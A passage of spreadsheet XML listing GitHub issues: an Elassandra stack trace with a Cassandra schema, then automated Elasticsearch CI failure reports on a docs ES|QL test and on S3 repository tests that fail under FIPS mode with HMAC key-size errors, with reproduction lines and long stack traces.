elassandra | at org.elasticsearch.search.fetch.subphase.InnerHitsFetchSubPhase.hitsExecute(InnerHitsFetchSubPhase.java:69) elassandra | at org.elasticsearch.search.fetch.FetchPhase.execute(FetchPhase.java:184) elassandra | at org.elasticsearch.search.SearchService.executeFetchPhase(SearchService.java:424) elassandra | at org.elasticsearch.search.SearchService.executeQueryPhase(SearchService.java:404) elassandra | at org.elasticsearch.search.SearchService.access$100(SearchService.java:127) elassandra | at org.elasticsearch.search.SearchService$2.onResponse(SearchService.java:360) elassandra |  9 common frames omitted  * cassandra schema:  CREATE KEYSPACE nested_data WITH replication = {'class': 'NetworkTopologyStrategy', 'DC1': '1'} AND durable_writes = true; CREATE TYPE nested_data.nested_data_parent_nested_nested_object1 ( field1 list&lt;text&gt;, field2 list&lt;text&gt; ); CREATE TYPE nested_data.nested_data_parent_nested_nested_object2 ( field2 list&lt;text&gt; ); CREATE TYPE nested_data.nested_data_parent_nested ( "nested-object1" list&lt;frozen&lt;nested_data_parent_nested_nested_object1&gt;&gt;, "nested-object2" list&lt;frozen&lt;nested_data_parent_nested_nested_object2&gt;&gt; ); CREATE TABLE nested_data.nested_data ( "_id" text PRIMARY KEY, "parent-nested" list&lt;frozen&lt;nested_data_parent_nested&gt;&gt; ) WITH bloom_filter_fp_chance = 0.01 AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'} AND comment = '' AND compaction = {'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32', 'min_threshold': '4'} AND compression = {'chunk_length_in_kb': '64', 'class': 'org.apache.cassandra.io.compress.LZ4Compressor'} AND crc_check_chance = 1.0 AND dclocal_read_repair_chance = 0.1 AND default_time_to_live = 0 AND gc_grace_seconds = 864000 AND max_index_interval = 2048 AND memtable_flush_period_in_ms = 0 AND min_index_interval = 128 AND read_repair_chance = 0.0 AND speculative_retry = '99PERCENTILE'; CREATE CUSTOM INDEX elastic_nested_data_idx ON nested_data.nested_data () USING 'org.elassandra.index.ExtendedElasticSecondaryIndex'; </t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/117099</t>
  </si>
  <si>
    <t>[CI] DocsClientYamlTestSuiteIT test {yaml=reference/esql/esql-across-clusters/line_197} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-intake #13107 / part1](https://gradle-enterprise.elastic.co/s/mdqjz45dhlfuy) - [elasticsearch-pull-request #41685 / part-1](https://gradle-enterprise.elastic.co/s/tcr2jmjrsshlk) - [elasticsearch-pull-request #41424 / part-1](https://gradle-enterprise.elastic.co/s/tf7ugickrvxkk) **Reproduction Line:**  ./gradlew ":docs:yamlRestTest" --tests "org.elasticsearch.smoketest.DocsClientYamlTestSuiteIT.test {yaml=reference/esql/esql-across-clusters/line_197}" -Dtests.seed=A0B22570DB8DDFD8 -Dtests.locale=kab -Dtests.timezone=America/North_Dakota/Beulah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smoketest.DocsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Dreference%2Fesql%2Fesql-across-clusters%2Fline_197%7D),title:'Test',type:optionsListControl **Failure Message:**  org.elasticsearch.client.WarningFailureException: method [DELETE], host [http://127.0.0.1:39033], URI [*,-.ds-ilm-history-*,-.ds-.slm-history-*,-.ds-.watcher-history-*?expand_wildcards=open%2Cclosed%2Chidden], status line [HTTP/1.1 200 OK] Warnings: [this request accesses system indices: [.async-search], but in a future major version, direct access to system indices will be prevented by default] {"acknowledged":true}  **Issue Reasons:** - [main] 3 failures in test test {yaml=reference/esql/esql-across-clusters/line_197} (0.3% fail rate in 903 executions) - [main] 2 failures in step part-1 (0.6% fail rate in 344 executions) - [main] 2 failures in pipeline elasticsearch-pull-request (0.6% fail rate in 359 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>? - CI generated</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/117525</t>
  </si>
  <si>
    <t>[CI] RepositoryS3EcsClientYamlTestSuiteIT class failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5111 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/pzinfuu7rhb5w) - [elasticsearch-periodic #5105 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ggsrlgb7j7rpa) - [elasticsearch-periodic #5099 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/juhevdup6jnps) - [elasticsearch-periodic #5093 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ucdlktixd3umq) - [elasticsearch-periodic #5087 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/trqcarswmml6o) - [elasticsearch-periodic #5081 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/nuze54fidqdos) - [elasticsearch-periodic #5075 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/3wxoydju7jwac) - [elasticsearch-periodic #5069 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/haqajpi3qx7mk) - [elasticsearch-periodic #5045 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ewn4sf6asb3ou) **Reproduction Line:**  ./gradlew ":modules:repository-s3:yamlRestTest" --tests "org.elasticsearch.repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT.test {yaml=repository_s3/50_repository_ecs_credentials/Snapshot and Restore with repository-s3 using ecs credentials}" -Dtests.seed=60E23031AFC65BB9 -Dtests.locale=gsw-LI -Dtests.timezone=Pacific/Chuuk -Druntime.java=17 -Dtests.fips.enabled=true  **Applicable branches:** 8.x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repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(org.elasticsearch.repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [repository_s3/50_repository_ecs_credentials:7]: expected [2xx] status code but api [snapshot.create_repository] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-V7oVcXBqQ86SidFb2nWROg/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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java.base/javax.crypto.Mac.chooseProvider(Mac.java:365)\n\tat java.base/javax.crypto.Mac.init(Mac.java:434)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\t 38 more\n"}],"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","caused_by":{"type":"i_o_exception","reason":"Unable to upload object [ecs_base_path/tests-V7oVcXBqQ86SidFb2nWROg/master.dat] using a single upload","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"illegal_key_exception","reason":"Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","stack_trace":"org.bouncycastle.crypto.IllegalKeyException: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java.base/javax.crypto.Mac.chooseProvider(Mac.java:365)\n\tat java.base/javax.crypto.Mac.init(Mac.java:434)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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java.base/java.lang.Thread.run(Thread.java:833)\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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java.base/javax.crypto.Mac.chooseProvider(Mac.java:365)\n\tat java.base/javax.crypto.Mac.init(Mac.java:434)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\t 38 more\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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java.base/javax.crypto.Mac.chooseProvider(Mac.java:365)\n\tat java.base/javax.crypto.Mac.init(Mac.java:434)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\t 38 more\n"},"stack_trace":"java.io.IOException: Unable to upload object [ecs_base_path/tests-V7oVcXBqQ86SidFb2nWROg/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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java.base/javax.crypto.Mac.chooseProvider(Mac.java:365)\n\tat java.base/javax.crypto.Mac.init(Mac.java:434)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\t 38 more\n"},"stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-V7oVcXBqQ86SidFb2nWROg/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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java.base/javax.crypto.Mac.chooseProvider(Mac.java:365)\n\tat java.base/javax.crypto.Mac.init(Mac.java:434)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\t 38 more\n"},"status":500}]  **Issue Reasons:** - [8.x] 9 consecutive failures in step openjdk17_checkpart1_java-fips-matrix - [8.x] 9 failures in class org.elasticsearch.repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT (2.0% fail rate in 453 executions) - [8.x] 9 failures in step openjdk17_checkpart1_java-fips-matrix (100.0% fail rate in 9 executions) - [8.x] 9 failures in pipeline elasticsearch-periodic (75.0% fail rate in 12 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/117596</t>
  </si>
  <si>
    <t>[CI] RepositoryS3ClientYamlTestSuiteIT class failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5105 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ggsrlgb7j7rpa) - [elasticsearch-periodic #5099 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/juhevdup6jnps) - [elasticsearch-periodic #5087 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/trqcarswmml6o) - [elasticsearch-periodic #5081 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/nuze54fidqdos) - [elasticsearch-periodic #5069 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/haqajpi3qx7mk) - [elasticsearch-periodic #5045 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ewn4sf6asb3ou) **Reproduction Line:**  ./gradlew ":modules:repository-s3:yamlRestTest" --tests "org.elasticsearch.repositories.s3.RepositoryS3ClientYamlTestSuiteIT.test {yaml=repository_s3/40_repository_ec2_credentials/Get a non existing snapshot}" -Dtests.seed=FAA9DF498EC1EED4 -Dtests.locale=ro -Dtests.timezone=Europe/Helsinki -Druntime.java=17 -Dtests.fips.enabled=true  **Applicable branches:** 8.x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repositories.s3.RepositoryS3ClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(org.elasticsearch.repositories.s3.RepositoryS3ClientYamlTestSuiteIT),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [repository_s3/40_repository_ec2_credentials:7]: expected [2xx] status code but api [snapshot.create_repository] returned [500 Internal Server Error] [ error: root_cause: - type: "repository_verification_exception" reason: "[repository_ec2] path [ec2_base_path] is not accessible on master node" stack_trace: "org.elasticsearch.repositories.RepositoryVerificationException:\ \ [repository_ec2] path [ec2_base_path] is not accessible on master node\nCaused\ \ by: java.io.IOException: Unable to upload object [ec2_base_path/tests-X8eE8K6AQYesIdw10Xk6vw/master.dat]\ \ using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$writeBlob$1(S3BlobContainer.java:144)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:569)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedIOException(SocketAccess.java:38)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlob(S3BlobContainer.java:142)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.blobstore.BlobContainer.writeBlob(BlobContainer.java:124)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlobAtomic(S3BlobContainer.java:304)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.blobstore.BlobStoreRepository.startVerification(BlobStoreRepository.java:2205)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.RepositoriesService.lambda$validatePutRepositoryRequest$11(RepositoriesService.java:373)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable$1.doRun(ActionRunnable.java:37)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1023)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\n\ \tat java.base/java.lang.Thread.run(Thread.java:833)\nCaused by: com.amazonaws.SdkClientException:\ \ Unable to calculate a request signature: Unable to calculate a request signature:\ \ Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\ \tat com.amazonaws.auth.AWS4Signer.newSigningKey(AWS4Signer.java:639)\n\tat\ \ com.amazonaws.auth.AWS4Signer.deriveSigningKey(AWS4Signer.java:404)\n\tat\ \ com.amazonaws.auth.AWS4Signer.sign(AWS4Signer.java:253)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeOneRequest(AmazonHttpClient.java:1320)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeHelper(AmazonHttpClient.java:1157)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.doExecute(AmazonHttpClient.java:814)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeWithTimer(AmazonHttpClient.java:781)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.execute(AmazonHttpClient.java:755)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.access$500(AmazonHttpClient.java:715)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutionBuilderImpl.execute(AmazonHttpClient.java:697)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:561)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:541)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5456)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5403)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.access$300(AmazonS3Client.java:421)\n\ \tat com.amazonaws.services.s3.AmazonS3Client$PutObjectStrategy.invokeServiceCall(AmazonS3Client.java:6531)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.uploadObject(AmazonS3Client.java:1861)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.putObject(AmazonS3Client.java:1821)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$executeSingleUpload$16(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.lambda$doPrivilegedVoid$0(SocketAccess.java:47)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:318)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedVoid(SocketAccess.java:46)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:464)\n\ \t 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate\ \ a request signature: Key size for HMAC must be at least 112 bits in approved\ \ mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\ \t 37 more\nCaused by: org.bouncycastle.crypto.IllegalKeyException: Key size\ \ for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.jcajce.provider.BaseHMac.engineInit(Unknown\ \ Source)\n\tat java.base/javax.crypto.Mac.init(Mac.java:432)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\ \t 38 more\n" type: "repository_verification_exception" reason: "[repository_ec2] path [ec2_base_path] is not accessible on master node" caused_by: type: "i_o_exception" reason: "Unable to upload object [ec2_base_path/tests-X8eE8K6AQYesIdw10Xk6vw/master.dat]\ \ using a single upload" caused_by: type: "sdk_client_exception" reason: "Unable to calculate a request signature: Unable to calculate a request\ \ signature: Key size for HMAC must be at least 112 bits in approved mode:\ \ SHA-256/HMAC" caused_by: type: "sdk_client_exception" reason: "Unable to calculate a request signature: Key size for HMAC must be\ \ at least 112 bits in approved mode: SHA-256/HMAC" caused_by: type: "illegal_key_exception" reason: "Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC" stack_trace: "org.bouncycastle.crypto.IllegalKeyException: Key size for\ \ HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat\ \ org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown\ \ Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.jcajce.provider.BaseHMac.engineInit(Unknown\ \ Source)\n\tat java.base/javax.crypto.Mac.init(Mac.java:432)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\ \tat com.amazonaws.auth.AWS4Signer.newSigningKey(AWS4Signer.java:639)\n\ \tat com.amazonaws.auth.AWS4Signer.deriveSigningKey(AWS4Signer.java:404)\n\ \tat com.amazonaws.auth.AWS4Signer.sign(AWS4Signer.java:253)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeOneRequest(AmazonHttpClient.java:1320)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeHelper(AmazonHttpClient.java:1157)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.doExecute(AmazonHttpClient.java:814)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeWithTimer(AmazonHttpClient.java:781)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.execute(AmazonHttpClient.java:755)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.access$500(AmazonHttpClient.java:715)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutionBuilderImpl.execute(AmazonHttpClient.java:697)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:561)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:541)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5456)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5403)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.access$300(AmazonS3Client.java:421)\n\ \tat com.amazonaws.services.s3.AmazonS3Client$PutObjectStrategy.invokeServiceCall(AmazonS3Client.java:6531)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.uploadObject(AmazonS3Client.java:1861)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.putObject(AmazonS3Client.java:1821)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$executeSingleUpload$16(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.lambda$doPrivilegedVoid$0(SocketAccess.java:47)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:318)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedVoid(SocketAccess.java:46)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$writeBlob$1(S3BlobContainer.java:144)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:569)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedIOException(SocketAccess.java:38)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlob(S3BlobContainer.java:142)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.blobstore.BlobContainer.writeBlob(BlobContainer.java:124)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlobAtomic(S3BlobContainer.java:304)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.blobstore.BlobStoreRepository.startVerification(BlobStoreRepository.java:2205)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.RepositoriesService.lambda$validatePutRepositoryRequest$11(RepositoriesService.java:373)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable$1.doRun(ActionRunnable.java:37)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1023)\n\ \tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)\n\ \tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\n\ \tat java.base/java.lang.Thread.run(Thread.java:833)\n" stack_trace: "com.amazonaws.SdkClientException: Unable to calculate a request\ \ signature: Key size for HMAC must be at least 112 bits in approved mode:\ \ SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\ \tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\ \tat com.amazonaws.auth.AWS4Signer.newSigningKey(AWS4Signer.java:639)\n\t\ at com.amazonaws.auth.AWS4Signer.deriveSigningKey(AWS4Signer.java:404)\n\ \tat com.amazonaws.auth.AWS4Signer.sign(AWS4Signer.java:253)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeOneRequest(AmazonHttpClient.java:1320)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeHelper(AmazonHttpClient.java:1157)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.doExecute(AmazonHttpClient.java:814)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeWithTimer(AmazonHttpClient.java:781)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.execute(AmazonHttpClient.java:755)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.access$500(AmazonHttpClient.java:715)\n\ \tat com.amazonaws.http.AmazonHttpClient$RequestExecutionBuilderImpl.execute(AmazonHttpClient.java:697)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:561)\n\ \tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:541)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5456)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5403)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.access$300(AmazonS3Client.java:421)\n\ \tat com.amazonaws.services.s3.AmazonS3Client$PutObjectStrategy.invokeServiceCall(AmazonS3Client.java:6531)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.uploadObject(AmazonS3Client.java:1861)\n\ \tat com.amazonaws.services.s3.AmazonS3Client.putObject(AmazonS3Client.java:1821)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$executeSingleUpload$16(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.lambda$doPrivilegedVoid$0(SocketAccess.java:47)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:318)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedVoid(SocketAccess.java:46)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:464)\n\ \tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$writeBlob$1(S3BlobContainer.java:144)\n\ \tat java.base/java.security.AccessController.doPrivileged(AccessController.java:569)\n\ \tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedIOException(SocketAccess.java:38)\n\ \tat 